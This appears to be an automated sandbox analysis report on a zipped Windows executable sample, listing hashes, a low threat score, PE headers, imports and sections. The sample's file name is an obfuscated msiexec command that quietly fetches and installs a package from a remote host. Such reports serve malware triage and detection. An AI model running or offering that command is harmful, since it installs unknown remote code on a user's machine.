MDE_File_Sample_6513907adc294f6a32e43245b0e37f6622e24fbd[.]zip

Resubmissions

02/06/2023, 14:54

230602-r95nxabh93 3

02/06/2023, 14:53

230602-r9pyfsbh85 3

02/06/2023, 14:51

230602-r8kmcacd5v 3

Sharing

Copy URL Twitter E-mail

General

Target

MDE_File_Sample_6513907adc294f6a32e43245b0e37f6622e24fbd.zip
Size

47KB
MD5

7cda86048b524632644ca098e64f68b6
SHA1

7ee639db499ccd46e278a91a175743c1c1d49565
SHA256

515523be39577335650c960def1428dd3b934112ad1df11f47607ef42640dd3d
SHA512

48320d2807ca6d05bc29cbd174bd90c314e5f0e50353c160347440743201cbeaaae8bc2db756dff44c84eed96dd6ee69c05f3dee0beca8323a446c739dd962c5
SSDEEP

768:JeiLANRtWKq4OOcmdBmE0SOiFFx2kr10tsgf56sxI2ZAbOSDhvR3/fok9mTMvV5l:Jei4PWKzICmuOickxi96MnAt9vR/pMMV

Score

3^/10

Malware Config

Signatures

Unsigned PE 1 IoCs

Checks for missing Authenticode signature.

resource
unpack001/MSIexEC IzFThHYL=zcexEvXaY /q -PaCKAgE "HTTp:/u0.rS:8080/BYyuqryKlf/xSJloYt2Hq/71VWT52?Jordany Lorenzo" yyJZyT=Jdb

Files

MDE_File_Sample_6513907adc294f6a32e43245b0e37f6622e24fbd.zip
.zip

Password: 123
MSIexEC IzFThHYL=zcexEvXaY /q -PaCKAgE "HTTp:/u0.rS:8080/BYyuqryKlf/xSJloYt2Hq/71VWT52?Jordany Lorenzo" yyJZyT=Jdb
.exe windows x64

Password: 123

f222a63f4b272ad341460e317faa357c

Headers

DLL Characteristics

IMAGE_DLLCHARACTERISTICS_HIGH_ENTROPY_VA
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
IMAGE_DLLCHARACTERISTICS_NX_COMPAT
IMAGE_DLLCHARACTERISTICS_GUARD_CF
IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE

File Characteristics

IMAGE_FILE_EXECUTABLE_IMAGE
IMAGE_FILE_LARGE_ADDRESS_AWARE

Imports

advapi32

GetTokenInformation
SetSecurityDescriptorGroup
MakeAbsoluteSD
MakeSelfRelativeSD
RegQueryValueExW
OpenThreadToken
AddAccessAllowedAce
GetSecurityDescriptorLength
GetLengthSid
StartServiceCtrlDispatcherW
RegOpenKeyExW
InitializeAcl
InitializeSecurityDescriptor
SetThreadToken
FreeSid
OpenProcessToken
RegSetValueExW
RegisterServiceCtrlHandlerW
RegCreateKeyExW
SetServiceStatus
AllocateAndInitializeSid
EqualSid
GetAce
SetSecurityDescriptorOwner
RegEnumKeyW
RegCloseKey
RevertToSelf
AdjustTokenPrivileges
SetSecurityDescriptorDacl
LookupPrivilegeValueW

kernel32

GetModuleFileNameA
CompareStringW
CreateSemaphoreExW
HeapFree
SetLastError
EnterCriticalSection
GetCommandLineW
GetCurrentProcess
lstrlenW
GetStdHandle
ReleaseSemaphore
WriteFile
GetModuleHandleExW
GetModuleFileNameW
LeaveCriticalSection
InitializeCriticalSection
GetEnvironmentVariableW
InitializeCriticalSectionEx
WaitForThreadpoolTimerCallbacks
GetLocaleInfoW
WaitForSingleObject
GetCurrentThreadId
OpenEventW
GetVersionExW
ReleaseMutex
GetSystemDefaultLangID
GetACP
OpenProcess
GetVersion
SetProcessMitigationPolicy
CreateEventW
MultiByteToWideChar
Sleep
FormatMessageW
GetLastError
ReleaseSRWLockExclusive
OutputDebugStringW
SetEvent
CloseThreadpoolTimer
GetCurrentThread
AcquireSRWLockExclusive
WaitForSingleObjectEx
GlobalAlloc
OpenSemaphoreW
GlobalFree
CloseHandle
SetThreadpoolTimer
ReleaseSRWLockShared
CreateThreadpoolTimer
LoadLibraryW
CreateThread
HeapAlloc
SetCurrentDirectoryW
GetProcAddress
CreateMutexExW
AcquireSRWLockShared
DeleteCriticalSection
ExitProcess
GetCurrentProcessId
UnhandledExceptionFilter
GetProcessHeap
GetModuleHandleW
FreeLibrary
WideCharToMultiByte
GetFileType
DebugBreak
lstrcmpW
LoadLibraryExW
IsDebuggerPresent
GetSystemDirectoryW
DelayLoadFailureHook
LoadLibraryExA
GetTickCount
GetSystemTimeAsFileTime
QueryPerformanceCounter
OutputDebugStringA
TerminateProcess
SetUnhandledExceptionFilter
GetStartupInfoW

user32

MsgWaitForMultipleObjects
DispatchMessageW
PeekMessageW
IsCharAlphaNumericW
TranslateMessage
PostThreadMessageW
PostQuitMessage
GetMessageW

msvcrt

_errno
_XcptFilter
_amsg_exit
__getmainargs
__set_app_type
exit
_exit
_cexit
_ismbblead
__setusermatherr
_initterm
_acmdln
_fmode
_commode
_lock
_unlock
__dllonexit
_onexit
memcpy
memset
memmove
?terminate@@YAXXZ
_purecall
_vsnprintf
_wcsicmp
_vsnwprintf
__C_specific_handler
memcmp

ntdll

RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind

ole32

CoUninitialize
CoRegisterClassObject
CoRevokeClassObject
StgOpenStorage
CoInitialize

Sections

.text
Size: 66KB - Virtual size: 65KB

IMAGE_SCN_CNT_CODE
IMAGE_SCN_MEM_EXECUTE
IMAGE_SCN_MEM_READ

.rdata
Size: 17KB - Virtual size: 17KB

IMAGE_SCN_CNT_INITIALIZED_DATA
IMAGE_SCN_MEM_READ

.data
Size: 5KB - Virtual size: 9KB

IMAGE_SCN_CNT_INITIALIZED_DATA
IMAGE_SCN_MEM_READ
IMAGE_SCN_MEM_WRITE

.pdata
Size: 3KB - Virtual size: 2KB

IMAGE_SCN_CNT_INITIALIZED_DATA
IMAGE_SCN_MEM_READ

.didat
Size: 512B - Virtual size: 152B

IMAGE_SCN_CNT_INITIALIZED_DATA
IMAGE_SCN_MEM_READ
IMAGE_SCN_MEM_WRITE

.rsrc
Size: 8KB - Virtual size: 7KB

IMAGE_SCN_CNT_INITIALIZED_DATA
IMAGE_SCN_MEM_READ

.reloc
Size: 512B - Virtual size: 248B

IMAGE_SCN_CNT_INITIALIZED_DATA
IMAGE_SCN_MEM_DISCARDABLE
IMAGE_SCN_MEM_READ

Resubmissions

Sharing

General

Malware Config

Signatures

Files

Password: 123

Password: 123

f222a63f4b272ad341460e317faa357c

Headers

DLL Characteristics

File Characteristics

Imports

advapi32

kernel32

user32

msvcrt

ntdll

ole32

Sections

.text Size: 66KB - Virtual size: 65KB

.rdata Size: 17KB - Virtual size: 17KB

.data Size: 5KB - Virtual size: 9KB

.pdata Size: 3KB - Virtual size: 2KB

.didat Size: 512B - Virtual size: 152B

.rsrc Size: 8KB - Virtual size: 7KB

.reloc Size: 512B - Virtual size: 248B

.text
Size: 66KB - Virtual size: 65KB

.rdata
Size: 17KB - Virtual size: 17KB

.data
Size: 5KB - Virtual size: 9KB

.pdata
Size: 3KB - Virtual size: 2KB

.didat
Size: 512B - Virtual size: 152B

.rsrc
Size: 8KB - Virtual size: 7KB

.reloc
Size: 512B - Virtual size: 248B